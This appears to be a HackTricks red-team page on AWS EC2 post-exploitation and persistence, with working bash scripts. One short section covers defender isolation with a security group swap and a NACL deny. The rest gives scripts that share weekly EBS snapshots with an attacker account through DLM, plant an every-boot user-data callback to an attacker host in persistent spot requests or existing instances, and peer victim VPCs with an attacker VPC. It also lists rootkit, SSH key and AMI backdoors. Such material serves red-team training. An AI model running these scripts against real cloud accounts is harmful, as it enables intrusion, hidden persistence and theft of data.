{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
For more information check:
{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum {% endcontent-ref %}
If a defender finds that an EC2 instance was compromised, they will probably try to isolate the machine from the network. They could do this with an explicit Deny NACL (but NACLs are stateless and apply to the entire subnet), or by changing the instance's security group to one that allows no inbound or outbound traffic at all.
If the attacker already has a reverse shell originating from the machine, the connection is not killed when the SG is changed to allow no inbound or outbound traffic: security groups are stateful, and an established, tracked flow keeps being allowed until it is closed or idles past the connection tracking timeout (Security Group Connection Tracking). Two caveats: a flow that matched a rule allowing all traffic (0.0.0.0/0 or ::/0 on all ports) in both directions is untracked and is cut immediately when that rule is removed, and a stateless NACL deny cuts the flow regardless of tracking.
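The defender-side isolation described above, as an added example (not code from the original page): the security group swap that leaves a tracked reverse shell alive, followed by the stateless NACL deny that actually cuts it. `AWS="${AWS:-aws}"` allows a dry run with `AWS=echo`; all instance, SG, NACL and subnet IDs and the attacker CIDR are placeholders.

```bash
# Added example: isolating a compromised EC2 instance and why the SG swap
# alone does not kill an established reverse shell.
# AWS="${AWS:-aws}" lets you dry-run with AWS=echo; all IDs are placeholders.
AWS="${AWS:-aws}"

# Step 1: replace every SG on the instance with an empty "quarantine" SG.
# New connections are blocked, but a tracked TCP flow (a reverse shell that
# the box opened towards the attacker) keeps passing until it closes or idles
# past the tracking timeout (5 days by default for an established TCP flow).
quarantine_instance() {
  instance_id="$1"; quarantine_sg="$2"
  $AWS ec2 modify-instance-attribute --instance-id "$instance_id" --groups "$quarantine_sg"
}

# Step 2: NACLs are stateless, so explicit DENY entries for the attacker's
# address break the existing flow at the subnet boundary in both directions.
# Rules are evaluated lowest number first, so use a low number. This affects
# every instance in the subnet, which is the cost mentioned in the text.
nacl_block_ip() {
  nacl_id="$1"; cidr="$2"; rule_number="${3:-10}"
  $AWS ec2 create-network-acl-entry --network-acl-id "$nacl_id" --rule-number "$rule_number" \
    --protocol -1 --rule-action deny --egress --cidr-block "$cidr"
  $AWS ec2 create-network-acl-entry --network-acl-id "$nacl_id" --rule-number "$rule_number" \
    --protocol -1 --rule-action deny --ingress --cidr-block "$cidr"
}

# Find the NACL associated with the instance's subnet.
nacl_for_subnet() {
  subnet_id="$1"
  $AWS ec2 describe-network-acls --filters "Name=association.subnet-id,Values=$subnet_id" \
    --query 'NetworkAcls[0].NetworkAclId' --output text
}

# Usage: quarantine_instance i-0123456789abcdef0 sg-0quarantine
#        nacl_block_ip "$(nacl_for_subnet subnet-0123456789abcdef0)" 203.0.113.5/32
```

The attacker's address comes from the instance itself (`ss -tnp` on the box, or VPC Flow Logs). Note that the same rule number is reused for the egress and ingress entries because NACL rule numbers are independent per direction.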
This service (Amazon Data Lifecycle Manager) allows scheduling the creation of AMIs and snapshots and even sharing them with other accounts.
An attacker could configure weekly AMIs of the instances or weekly snapshots of the volumes and share them with an account they control, so the data keeps leaving the victim account on a schedule without any further API call from the attacker.
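A lifecycle policy of the kind described above, as an added example (not code from the original page): DLM snapshots every volume carrying a chosen tag on a weekly cron and shares each snapshot with the attacker's account. `AWS="${AWS:-aws}"` allows a dry run with `AWS=echo`; the tag, the account ID and the schedule are placeholders.

```bash
# Added example: DLM snapshot policy that shares every snapshot with an
# attacker-controlled account. AWS="${AWS:-aws}" allows AWS=echo dry runs;
# tag, account ID and cron are placeholders.
AWS="${AWS:-aws}"

# PolicyDetails document for `aws dlm create-lifecycle-policy`.
# $1 = target account, $2/$3 = tag key/value that selects the volumes
# (DLM only targets resources by tag), $4 = DLM cron expression in UTC.
dlm_policy_details() {
  target_account="$1"; tag_key="$2"; tag_value="$3"
  cron="${4:-cron(0 3 ? * SUN *)}"
  cat <<EOF
{
  "PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
  "ResourceTypes": ["VOLUME"],
  "TargetTags": [{"Key": "$tag_key", "Value": "$tag_value"}],
  "Schedules": [{
    "Name": "weekly",
    "CopyTags": false,
    "CreateRule": {"CronExpression": "$cron"},
    "RetainRule": {"Count": 1},
    "ShareRules": [{"TargetAccounts": ["$target_account"]}]
  }]
}
EOF
}

# Create the AWS-managed default DLM role for snapshot policies if it does
# not exist yet, then register the policy in ENABLED state.
create_sharing_policy() {
  target_account="$1"; tag_key="$2"; tag_value="$3"
  $AWS dlm create-default-role --resource-type snapshot
  role_arn=$($AWS iam get-role --role-name AWSDataLifecycleManagerDefaultRole \
    --query Role.Arn --output text)
  $AWS dlm create-lifecycle-policy \
    --execution-role-arn "$role_arn" \
    --description "ebs maintenance" \
    --state ENABLED \
    --policy-details "$(dlm_policy_details "$target_account" "$tag_key" "$tag_value")"
}

# Usage: create_sharing_policy 123456789012 Backup true
```

Volumes without the tag are not included, so an attacker with `ec2:CreateTags` would first tag the interesting ones. Snapshots encrypted with the default `aws/ebs` KMS key cannot be shared at all, and those encrypted with a customer-managed key also need the key policy to allow the target account. Since `RetainRule` keeps only one snapshot, the receiving account should `aws ec2 copy-snapshot` each shared snapshot before the next run replaces it.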
Scheduled (Reserved) Instances made it possible to schedule instances to run daily, weekly or monthly. An attacker could use this to periodically bring up a machine with a high-privilege instance profile or with interesting network access that they can reach. AWS has stopped selling Scheduled Reserved Instances, so on a current account this is mostly of historical interest and the same effect is obtained with a scheduled Auto Scaling action or a scheduler that starts the instance.
Spot instances are cheaper than regular instances. An attacker could create a small persistent spot request or spot fleet valid for years (5, for example), with automatic public IP assignment, a high-privilege IAM instance profile and user data that reports the instance's IP address to the attacker every time a spot instance starts, so the foothold keeps coming back after each interruption.
An attacker could get access to the instances and backdoor them:
- Using a traditional rootkit, for example
- Adding a new public SSH key (check EC2 privesc options)
- Backdooring the User Data
- Backdooring the AMI being used
- Backdooring the Key Pair
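The user data payload used by both the spot instance trick above and the "backdooring the User Data" item, as an added example (not code from the original page). Plain user data only runs on the instance's first boot, so the script is wrapped in the MIME multipart form that tells cloud-init to run user scripts on every boot; the same wrapped payload is then used (a) as the user data of a persistent spot request carrying a high-privilege instance profile and (b) written into an existing instance's user data. `AWS="${AWS:-aws}"` allows a dry run with `AWS=echo`; the attacker URL, the IDs and the profile name are placeholders.

```bash
# Added example: a callback delivered via EC2 user data that runs on every
# boot, used for a persistent spot request and for backdooring an existing
# instance. AWS="${AWS:-aws}" allows AWS=echo dry runs; URL, IDs and the
# instance profile name are placeholders.
AWS="${AWS:-aws}"

# Script that runs on the instance: reads instance ID and public IP through
# IMDSv2 and POSTs them to the attacker's listener.
callback_script() {
  attacker_url="$1"
  cat <<EOF
#!/bin/bash
TOKEN=\$(curl -s -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 300")
MD=http://169.254.169.254/latest/meta-data
ID=\$(curl -s -H "X-aws-ec2-metadata-token: \$TOKEN" \$MD/instance-id)
IP=\$(curl -s -H "X-aws-ec2-metadata-token: \$TOKEN" \$MD/public-ipv4)
curl -s -X POST -d "id=\$ID&ip=\$IP" "$attacker_url"
EOF
}

# cloud-init runs a plain user data script once. This multipart wrapper sets
# cloud_final_modules so the scripts-user module runs "always", i.e. on every
# boot. Reads the script from stdin.
every_boot_userdata() {
  printf 'Content-Type: multipart/mixed; boundary="//"\nMIME-Version: 1.0\n\n'
  printf -- '--//\nContent-Type: text/cloud-config; charset="us-ascii"\n\n'
  printf '#cloud-config\ncloud_final_modules:\n- [scripts-user, always]\n\n'
  printf -- '--//\nContent-Type: text/x-shellscript; charset="us-ascii"\n\n'
  cat
  printf -- '\n--//--\n'
}

# Unwrapped base64: both APIs below take raw base64 user data, and GNU base64
# wraps its output at 76 columns by default.
b64() { base64 | tr -d '\n'; }

# (a) Persistent spot request: re-launched after every interruption until
# ValidUntil, with a public IP and the chosen instance profile.
request_persistent_spot() {
  ami="$1"; itype="$2"; profile="$3"; subnet="$4"; sg="$5"; attacker_url="$6"
  valid_until="${7:-2030-01-01T00:00:00Z}"
  userdata=$(callback_script "$attacker_url" | every_boot_userdata | b64)
  $AWS ec2 request-spot-instances --type persistent --instance-count 1 \
    --valid-until "$valid_until" --launch-specification "{
      \"ImageId\": \"$ami\", \"InstanceType\": \"$itype\",
      \"IamInstanceProfile\": {\"Name\": \"$profile\"},
      \"UserData\": \"$userdata\",
      \"NetworkInterfaces\": [{\"DeviceIndex\": 0, \"SubnetId\": \"$subnet\",
        \"Groups\": [\"$sg\"], \"AssociatePublicIpAddress\": true}]}"
}

# (b) Backdoor an existing instance. User data can only be changed while the
# instance is stopped, so the stop/start shows up in CloudTrail.
backdoor_user_data() {
  instance_id="$1"; attacker_url="$2"
  userdata=$(callback_script "$attacker_url" | every_boot_userdata | b64)
  $AWS ec2 stop-instances --instance-ids "$instance_id"
  $AWS ec2 wait instance-stopped --instance-ids "$instance_id"
  $AWS ec2 modify-instance-attribute --instance-id "$instance_id" \
    --attribute userData --value "$userdata"
  $AWS ec2 start-instances --instance-ids "$instance_id"
}

# Usage: request_persistent_spot ami-0123456789abcdef0 t3.micro AdminProfile \
#          subnet-0123456789abcdef0 sg-0123456789abcdef0 https://attacker.example/cb
#        backdoor_user_data i-0123456789abcdef0 https://attacker.example/cb
```

Attaching the instance profile requires `iam:PassRole` on its role. Both the user data (`ec2:DescribeInstanceAttribute`) and the spot request (`ec2:DescribeSpotInstanceRequests`) are readable by anyone with those permissions, so the callback URL is not hidden from a defender who looks.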
Create a VPN (for example a Client VPN endpoint, or a Site-to-Site VPN to attacker-controlled infrastructure) so the attacker can connect directly through it into the VPC.
Create a peering connection between the victim VPC and the attacker VPC so the attacker can reach the victim VPC directly. The victim side also needs routes to the attacker CIDR and security groups that allow it, and the two VPC CIDRs must not overlap.
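The peering setup described above, as an added example (not code from the original page): request the peering from the victim account, accept it from the attacker account, then add the route and security group rule on the victim side. `AWS="${AWS:-aws}"` allows a dry run with `AWS=echo`; account IDs, VPC IDs, CIDRs and the CLI profile name are placeholders.

```bash
# Added example: VPC peering between a victim VPC and an attacker VPC.
# AWS="${AWS:-aws}" allows AWS=echo dry runs; all IDs are placeholders.
AWS="${AWS:-aws}"

# Run with victim credentials: request the peering towards the attacker VPC
# and print the peering connection ID.
request_peering() {
  victim_vpc="$1"; attacker_account="$2"; attacker_vpc="$3"; attacker_region="$4"
  $AWS ec2 create-vpc-peering-connection --vpc-id "$victim_vpc" \
    --peer-owner-id "$attacker_account" --peer-vpc-id "$attacker_vpc" \
    --peer-region "$attacker_region" \
    --query VpcPeeringConnection.VpcPeeringConnectionId --output text
}

# Run with attacker credentials (a second CLI profile): accept the request.
accept_peering() {
  pcx_id="$1"; profile="$2"
  $AWS ec2 accept-vpc-peering-connection --vpc-peering-connection-id "$pcx_id" --profile "$profile"
}

# Victim side: route the attacker CIDR through the peering in every route
# table of the VPC and allow it in a security group attached to the targets.
# Without the return route here, traffic from the attacker VPC never comes back.
open_route_and_sg() {
  vpc="$1"; pcx_id="$2"; peer_cidr="$3"; sg="$4"
  for rtb in $($AWS ec2 describe-route-tables --filters "Name=vpc-id,Values=$vpc" \
      --query 'RouteTables[].RouteTableId' --output text); do
    $AWS ec2 create-route --route-table-id "$rtb" --destination-cidr-block "$peer_cidr" \
      --vpc-peering-connection-id "$pcx_id"
  done
  $AWS ec2 authorize-security-group-ingress --group-id "$sg" --protocol -1 --cidr "$peer_cidr"
}

# Usage: pcx=$(request_peering vpc-0victim 123456789012 vpc-0attacker us-east-1)
#        accept_peering "$pcx" attacker
#        open_route_and_sg vpc-0victim "$pcx" 10.99.0.0/16 sg-0123456789abcdef0
```

The attacker VPC needs the mirror-image route towards the victim CIDR. Peering is not transitive, so only the two VPCs named in the connection can talk; on the other hand the connection is visible in both accounts under `ec2:DescribeVpcPeeringConnections`, which is a cheap thing for a defender to alert on.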